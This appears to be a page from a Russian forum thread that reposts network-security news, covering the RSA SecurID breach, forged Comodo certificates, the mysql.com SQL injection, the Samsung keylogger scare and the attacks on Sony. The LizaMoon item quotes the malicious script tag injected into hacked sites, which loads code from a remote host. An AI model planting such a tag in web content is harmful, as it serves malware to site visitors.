Твой софтовый форум > Интернет > Безопасность в сети

Новости сетевой безопасности

,

все новости по сетевой безопасности

Дата публикации: 14.10.2019 - 12:28
Pages: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80
HugoBo-SS
Хакеры добрались до одноразовых паролей


Твой софтовый форум


Компания RSA, известный поставщик систем двухфакторной аутентификации стала жертвой изощренной хакерской атаки, в результате которой с корпоративных серверов была похищена конфиденциальная информация по продуктам и технологиям одноразовых паролей SecureID. Информация о взломе была на днях опубликована в блоге Арта Ковелло (Art Coviello), бывшего генерального директора компании RSA, которая в 2006 году была приобретена корпорацией EMC.
» Нажмите, для открытия спойлера | Press to open the spoiler «
По материалам сайтов NewEnterprise и Wired

Добавлено:

Хакеры взломали алгоритм для получения Microsoft Points


Хакеры нашли слабость в алгоритме генерации предоплаченного кода и использовали уязвимость для получения бесплатных Microsoft Point'ов для сотен людей.
» Нажмите, для открытия спойлера | Press to open the spoiler «
По материалам news_softpedia
vic171
Браузеры шпионы

Твой софтовый форум


Для удобного серфинга в Интернете существует немало программ-браузеров, обладающих богатым набором всевозможных функций. Конкуренция между их разработчиками приносит свои плоды. Браузеры становятся всё более комфортными и удобными в использовании. Но далеко не все пользователи имеют полное представление о том, какую информацию о вас и вашей системе во время серфинга по Сети передает браузер своим создателям. А передают они немало, в том числе и конфиденциальные данные.

Google Chrome.
» Нажмите, для открытия спойлера | Press to open the spoiler «


Internet Explorer.
» Нажмите, для открытия спойлера | Press to open the spoiler «


Opera.
» Нажмите, для открытия спойлера | Press to open the spoiler «

Firefox.
» Нажмите, для открытия спойлера | Press to open the spoiler «


--------
Вместо выводов. Как видно из обзора, обычный серфинг в Интернете на самом деле не так прост, как это может показаться на первый взгляд. При этом информация о вашем компьютере вполне может быть ещё более полной. Ведь данные, о которых идёт речь в статье, – это то, о чём «признались» разработчики, и неизвестно, что передают браузеры на самом деле. В любом случае, посещая сайты, следует быть осторожным.
HugoBo-SS
Китайский производитель средств защиты попался на распространении вирусов


Китайскому производителю антивирусов, компании NetQin предъявлены обвинения в сознательном распространении вредоносных приложений для сотовых телефонов. Обозреватели государственного телевидения, уличившие компанию в нечестной игре, утверждают, что борцы с интернет-угрозами распространяли мобильный вирус собственного изготовления с целью получения дохода от предоставления клиентам дополнительных услуг.
» Нажмите, для открытия спойлера | Press to open the spoiler «
По материалам сайта Cellular-News
Котенка
Евросоюз защищается от хакерской атаки отключением


Компьютерные сети Еврокомиссии и Европейской службы внешнеполитической деятельности подверглись "крупной" хакерской атаке. Об этом сообщает EUObserver со ссылкой на анонимный источник в руководстве Евросоюза.

Все сотрудники этих двух организаций получили email с предупреждением об атаке и рекомендациями по принятию мер безопасности. Характер атаки в письме не раскрывается, однако упоминается, что эта атака продолжается в настоящий момент. С целью предотвратить утечку важной информации доступ к локальной сети извне был перекрыт, всем сотрудникам было предложено сменить свои пароли и обмениваться критической информацией при помощи защищённых email-сообщений.

» Нажмите, для открытия спойлера | Press to open the spoiler «


Источник: Вебпланета
Котенка
Хакеры получили сертификаты сайтов Google, Skype и Microsoft


Неизвестные хакеры получили SSL-сертификаты сайтов Google, Skype, Microsoft и других интернет-компаний. Для этого они взломали систему безопасности компании Comodo, которая выпускает подобные сертификаты, говорится в сообщении, опубликованном на сайте компании.

Хакеры взломали один из корневых центров сертификации (root authority), после чего смогли создать новую учетную запись. С помощью этой учетной записи они выпустили в общей сложности девять SSL-сертификатов для доступа к популярным доменам. В их число вошли www.google.com, mail.google.com, mail.yahoo.com, login.skype.com, а также login.live.com.

» Нажмите, для открытия спойлера | Press to open the spoiler «
Котенка
Сайт MySQL взломали SQL-инъекцией


Твой софтовый форум Некие румынские хакеры, откликающиеся на имена TinKode и Ne0h, опубликовали данные, собранные ими в результате взлома сайтов mysql.com и sun.com.

Официальный сайт MySQL содержит по крайней мере две уязвимости: одна типа SQL-инъекция, а вторая — типа межсайтовый скриптинг (XSS). Благодаря первой из них взломщики сумели считать список баз данных, использующихся этим ресурсом, список таблиц некоторых этих баз, а также содержимое таблиц с данными об их пользователях — логинами и паролями, хэшированными при помощи стандартной функции MySQL password().

Кроме того, удалось обнаружить email-адреса пользователей, также с хэшами паролей (MD5). Некоторые из паролей того и другого типа удалось восстановить (способ не уточняется, но наверняка использовалась одна из онлайн-баз хэшей, коих в Сети предостаточно).
» Нажмите, для открытия спойлера | Press to open the spoiler «


Источник: Вебпланета
potok
Samsung устанавливает на ноутбуки шпионское ПО?

Твой софтовый форум

Интернет-сообщество взбудоражено известием о том, что крупный производитель бытовой и компьютерной техники Samsung Electronics, вероятно, сознательно поставлял портативные персональные компьютеры с предустановленным шпионским программным обеспечением.

Специалист по информационной безопасности Мохаммед Хасан на ресурсе Network World рассказал о случившемся с ним инциденте. Некоторое время назад он приобрел новый ноутбук Samsung серии R, модель 525; по своей давней привычке специалист провел предварительное антивирусное сканирование операционной системы... и обнаружил в каталоге C:\WINDOWS\SL коммерческий шпионский инструмент StarLogger.

StarLogger - это средство мониторинга действий пользователя, или, проще, кейлоггер. Он отслеживает все вводимые с клавиатуры данные, делает снимки экрана и регулярно посылает собираемые сведения на заданный ему электронный адрес. Естественно, что вместе с прочими сведениями к "хозяину" уходят и аутентификационные данные (логины и пароли), и другая конфиденциальная информация. Визуально "продукт" себя никак не проявляет.

Г-н Хасан избавился от кейлоггера и какое-то время работал с ноутбуком, однако вскоре у него возникли проблемы с дисплеем, и специалист вернул портативный компьютер в магазин. Посетив другую торговую точку, он приобрел модель из той же серии, но с более высоким номером - R540; каково же было его удивление, когда и на этом устройстве обнаружился тот же самый кейлоггер, расположенный в той же самой папке.

После этого Хасан отправился выяснять, известно ли производителю о наличии кейлоггера и какие объяснения Samsung может предложить относительно случившегося. В первую очередь был оформлен запрос в техническую поддержку компании.

Специалист рассказывает, что сотрудники поддержки первого уровня сначала утверждали, будто никакого шпионского ПО на компьютерах быть не может. Когда г-н Хасан указал, что один и тот же кейлоггер оказался идентичным образом установлен на два разных ноутбука из одной серии, купленных в разных магазинах, ему заявили, что Samsung отвечает только за аппаратное обеспечение, а по вопросам обеспечения программного необходимо обратиться в корпорацию Microsoft. Эксперт, однако, стоял на своем и добился переключения на одного из старших технических консультантов.

Тот, в свою очередь, поведал г-ну Хасану, что компания действительно установила на ноутбуки такую программу, "чтобы отслеживать производительность машины и условия ее использования". На этом основании специалист сделал окончательный вывод - Samsung сознательно поставляла клиентам портативные компьютеры, инфицированные шпионским программным обеспечением, - о чем и написал в своей статье на Network World. Позднее, комментируя инцидент для Интернет-издания V3.co.uk, он добавил, что консультант технической поддержки еще и пытался убедить его в том, будто все производители компьютерной техники внедряют в системы такие кейлоггеры, и вообще здесь совершенно не о чем беспокоиться.

Пресс-секретарь компании Samsung Джейсон Редмонд сообщил журналистам, что по факту инцидента начато внутреннее расследование, и все представленные г-ном Хасаном сведения будут самым тщательным образом проверены. Он также отметил, что никогда не слышал ни о производителе StarLogger - фирме De Willebois Consulting, - ни о каких-либо эпизодах сотрудничества или партнерских отношениях Samsung с этой компанией.

Источник : http://www.securitylab.ru/news/405265.php
HugoBo-SS
В продолжение предыдущего:

Кейлоггер на ноутбуках Samsung оказался «вымыслом» антивируса


Компании Samsung удалось снять с себя ложные обвинения в незаконном сборе информации о клиентах. Напомним, что вчера специалист в области информационной безопасности по имени Мохамед Хассан (Mohamed Hassan) опубликовал в сети сведения об обнаружении потенциально опасной программы-кейлоггера на двух совершенно новых ноутбуках от южнокорейского производителя.
» Нажмите, для открытия спойлера | Press to open the spoiler «
По материалам сайта CNET

ЗЫ У любой "мании" глаза велики biggrin.gif А всякие Кашмарские и иже с ним только нагнетают "вирусные мании", поскольку это - основа их бизнеса. wink.gif Эх, была бы и у "антивирусников" ощутимая ответственность за введение в заблуждение пользователей...
Котенка
Атака LizaMoon заразила около 1,5 млн сайтов


Более 1,5 млн сайтов по всему миру заразились в результате атаки вирусом, который встраивает в URL ссылки на вредоносный файл. Такова предварительная оценка масштабов атаки типа «SQL-внедрение», которую провели специалисты Websense Security. Эта американская лаборатория впервые заметила вредоносные файлы 29 марта, сообщает BFM.

Внедряемый файл меняет текстовые поля в базе данных и внедряет в них дополнительный фрагмент <script src=hxxp://lizamoon.com/ur.php>, который загружает с удаленного сервера вредоносную программу. Затем пользователей направляли на сайт с фальшивыми антивирусными утилитами под названием Windows Stability Center. С него предлагалось за деньги загрузить антивирусное ПО. Microsoft отношения к этому сайту не имеет. Websense Security перечисляет несколько адресов с вредоносным файлом, на которые направляют пользователей.

Атака названа по имени вредоносного кода, который загружается в ссылки, — LizaMoon.
Котенка
Хакеры Anonymous начали атаку на компанию Sony и ее ресурсы


Твой софтовый форум Хакерская группировка Anonymous, получившая известность после серии политических кибератак, сегодня сообщила о планах по атаке на корпорацию Sony. Об этом говорится в сообщении самой группы, размещенном в ее блоге.

В заявлении группы «мстителей» говорится, что последние действия Sony в отношении двух разработчиков программного обеспечения, известных как Geohot и Graf-Chоkolo, «являются совершенно непростительными». Также в Anonymous говорят, что ранее предупреждали Sony в частном порядке, но данные предупреждения не возымели должного эффекта.

Напомним, что ранее в этом году Sony подала судебный иск против группы хакеров, взломавших игровую консоль Playstation 3. Во взломе обвинялся Джордж Готц (Geohot) и еще один человек, известный только под никнеймом. Sony заявила, что разработка хакеров, позволяющая запускать в PS3 в обход ограничений любое программное обеспечение, нарушает закон о цифровых правах DMCA (Digital Millennium Copyright Act), кроме того Sony обвинила разработчиков в мошенничестве.

Несмотря на то, что Хотц отрицал формулировку Sony о нарушении прав на Firmware, суд принял предварительное решение в пользу компании. Сейчас слушания по данному иску идут в калифорнийском суде, хотя сам Хотц является жителем штата Нью-Джерси. Более того, недавно компания Sony запросила данные об учетных записях хакеров в социальных сетях и получила доступ к ним. По этим данным компания установила рабочие IP-адреса взломщиков.
» Нажмите, для открытия спойлера | Press to open the spoiler «


Обновлено По последним сведениям, в отношение веб-сайтов Sony.com и Playstation.com началась массированная DDOS-атака. Серверы Playstation.com уже недоступны по всему миру, сайт Sony.com работает со сбоями. В пресс-службе Sony пока ситуацию не комментируют.

Источник: cybersecurity.ru
Быстрый ответ:

 Включить смайлики |  Добавить подпись


Pages: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80


SoftoRooM.NeT lite версия, полная версия - здесь: Новости сетевой безопасности
SoftoRooM.NeT © 2004-2019